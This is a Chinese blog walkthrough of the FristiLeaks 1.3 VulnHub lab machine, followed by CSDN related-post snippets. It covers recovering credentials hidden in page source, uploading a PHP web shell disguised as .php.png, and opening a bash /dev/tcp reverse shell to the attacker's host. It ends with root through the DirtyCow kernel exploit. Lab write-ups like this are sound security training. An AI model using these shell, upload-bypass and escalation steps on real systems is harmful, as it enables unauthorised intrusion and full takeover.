【vulhub】FRISTILEAKS:1.3

于 2024-07-17 09:00:46 发布
阅读量319 收藏 3
点赞数 5
文章标签: 服务器 linux 安全 系统安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55349490/article/details/140473035
版权

目录

下载地址

FristiLeaks: 1.3 ~ VulnHub

1、信息收集

获取ip

打开靶机就可以看到Ip

192.168.8.23

获取端口

fscan扫一下 获取80端口

目录扫描

网站访问 192.168.8.23:80

dirsearch扫描
发现有一个 images 目录

访问一下,
里面有两张图片
根据图1判断不是正确的url
图2就是首页图片

再看下 /robots.txt
发现有三个目录

挨个访问
三个地址都是这个图片

说明都不对

再回头看下图片,

发现 /fristi 是可以访问的目录

访问后可以看到

需要我们登录

弱口令登录失败,尝试从源码里面获取有用的信息
发现了一串base64加密字符串

解码
一眼Png

用赛博厨子直接解码后保存文件

得到提示

这个可能是账号,也可能是密码
先用admin/keKkeKKeKKeKkEkkEk尝试登录发现失败了
在源码里面查看更多的提示

获取到了作者的名字 eezeepz 可能是账号

eezeepz/keKkeKKeKKeKkEkkEk 登录成功

2、漏洞利用

登录后跳转页面 显示有文件上传

上传一个马儿,加个后缀.png

访问地址 http://192.168.8.23/fristi/uploads/pass.php.png
哥斯拉连接

3、提权

命令执行发现自己并不是管理员

反弹shell
nc -lvvp 5566
bash -i >& /dev/tcp/192.168.8.4/5566 0>&1

反弹shell到kali上,方便后续操作

切换为交互式tty:

python -c 'import pty; pty.spawn("/bin/bash")'

脚本检测

上传一个提权检测脚本到tmp目录


运行脚本

cd /tmp 
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

这里扫出来了很多可能可以利用的漏洞

脏牛提权

我们直接用第一个 [CVE-2016-5195] dirtycow 脏牛漏洞
GitHub - firefart/dirtycow: Dirty Cow exploit - CVE-2016-5195
下载项目里面的提权脚本 ditry.c

哥斯拉将它上传到 /tmp 目录

编译执行

gcc -o dirty dirty.c -pthread -lcrypt
chmod +x dirty
./dirty

成功提权

为几何欢
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
(一)vulhub专栏:FastJson1.2.24、1.2.27漏洞复现
云舒的博客
05-26 1579
入职大厂必会 写在前面的话:请注意本篇博客最后面的附(注意java版本),本篇博客采用的是LDAP服务getshell,rmi同理。阅读本篇博客需了解fastjson,ldap,rmi。 启动靶场 在终端里进入事先进入准备好的vulhub靶场目录下, cd fastjson/1.2.24-rce/ sudo docker-compose up -d 执行命令后,看到如下图所示即为成功,此时可在浏览器中输入http://ip:8090,正常访问即为靶场启动成功。 漏洞发现 漏洞成因 从 fastjson
vulhub ica:1靶场
GRXHunter的博客
04-11 3827
vulhub ica1靶场实测
vulhub thales:1 靶场
GRXHunter的博客
04-12 3439
vulhub thales:1靶场
(七)vulhub专栏:Log4j 反序列化、远程代码执行漏洞复现
云舒的博客
07-21 982
log4j 反序列化、远程代码执行漏洞
vulhub-HA:Natraj
2201_75378806的博客
05-14 259
因为这是 auth.log 并且访问机器的唯一方法是通过 ssh。3.在kali上创建一个php的reverseshell并将其上传到目标。检查了是否可以访问任何日志文件(apache2、auth 等)。尝试了不同的 shell(nc、python2、python3)。Python3 是成功的。fuzz大法,看看有没有参数(可以用Bp)一开始是fuzz文件,后来直接fuzz参数。2.使用wget将文件上传到目标机器并复制该文件以替换apache2的实际配置文件。尝试访问这些用户的 ssh 密钥,没成功。
(二)vulhub专栏:Shiro漏洞复现汇总
云舒的博客
06-03 1886
Shiro漏洞复现汇总
轻松搞定Vulhub靶场:详细Docker安装与YUM源配置指南
m0_68483928的博客
07-13 671
Vulhub是一个开源的漏洞靶场项目,旨在为用户提供一系列基于Docker的易于使用的漏洞环境。每个环境都涵盖了特定的漏洞或漏洞集,允许用户在本地快速搭建和测试这些环境。Docker 就像是一个“容器工厂”,它能帮你把应用程序和它们需要的一切(比如运行的环境和依赖的库)打包在一个“容器”里。想象一下,你有一个软件,这个软件在你电脑上能运行,但放到别人的电脑上可能就会出问题,因为别人的电脑环境跟你的不一样。Docker 就是为了避免这种问题,让你的软件“打包自带”环境和依赖,这样无论放到哪儿都能顺利运行。
(五)vulhub专栏:Jboss远程代码执行漏洞复现
云舒的博客
07-13 581
Jboss远程代码执行 CVE-2017-12149 CVE-2017-7504
(三)vulhub专栏:Ecshop Sql注入、远程代码执行漏洞复现
云舒的博客
07-05 1440
Referer值未做任何验证可被控制直接引用 采用_echash做分割,且为定值:2.x:554fcae493e564ee0dc75bdf2ebf94ca、3.x:45ea207d7a2b68c49582d2d22adf953a insert_ads函数的sql拼接不规范导致sql注入 make_val函数拼接字符串,拼接用户输入内容。......
vulhub:基于Docker-Compose的预构建脆弱环境
02-02
Vulhub是预先构建的易受攻击的Docker环境的开源集合。 不需要Docker的已有知识,只需执行两个简单的命令,您便拥有一个脆弱的环境。 安装 在Ubuntu 20.04上安装docker / docker-compose: # Install pip curl -s ...
IoT-vulhub:物联网固件防御复现环境
03-20
物联网-vulhub 受项目的启发,希望做一个IoT版的固件突破复现环境。 安装 在ubuntu16.04下安装docker和docker-compose: # 安装 pip $ curl -s https://bootstrap.pypa.io/get-pip.py | python3 # 安装最新版 ...
Vulhub-master
08-08
kali linux 下搭建 Vulhub 靶场(用于无法科学上网导致的下载失败)
vulhub靶场.zip
10-14
vulhub靶场
UWA学堂上新|服务器AOI(Area Of Interest)算法和功能实现
UWA—简单优化,优化简单!
07-12 403
基于.NetCore开发MMORPG分布式游戏服务器系列篇6
服务器网络配置
weixin_51338719的博客
07-16 362
服务器网络配置大体流程:硬件选择——系统安装——驱动调用——网卡配置
服务器】端口映射
2301_82023330的博客
07-11 1076
端口映射(Port Mapping)是一种网络技术,通过将一个端口的数据流重定向到另一个端口,允许外部设备访问内部网络中的特定服务。主要有本地端口映射、远程端口映射和动态端口映射三种类型。应用场景包括远程访问内部服务、穿透防火墙、提高安全性以及负载均衡和代理。本文详细介绍了端口映射的概念、类型、应用场景,并通过SSH命令示例展示如何在本地计算机上实现端口映射,以访问远程服务器上的服务。
搭建远程控制(远程桌面)服务器
最新发布
07-16 219
搭建一个属于自己的远程控制服务器,操作简单,一次成功。服务端电脑不需要设置,只需要设置路由器或光猫的防火墙。客户端的安装很简单,设置按截图操作即可。
ubuntu安装vulhub
09-13
在Ubuntu上安装Vulhub,你可以按照以下步骤进行操作: 1. 首先,你需要确保你的系统已经安装了Docker和Docker Compose。你可以使用以下命令安装它们: 2. 然后,你需要克隆Vulhub存储库到你的本地系统。你可以使用以下命令来完成这一步骤: ``` git clone https://github.com/vulhub/vulhub.git ``` 3. 进入vulhub目录: ``` cd vulhub ``` 4. 接下来,你可以使用Docker Compose来构建和启动Vulhub的容器。你可以使用以下命令完成这一步骤: ``` docker-compose build docker-compose up -d ``` 5. 安装完成后,你可以通过浏览器访问VulhubWeb界面。默认情况下,它位于 http://localhost 或者你的服务器的IP地址上。 请注意,以上步骤是基于引用内容和进行的,这些内容提供了安装软件和配置环境的基本步骤。如果你已经按照这些引用内容进行了相关的安装和配置操作,那么你应该已经具备了安装Vulhub所需的基本条件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值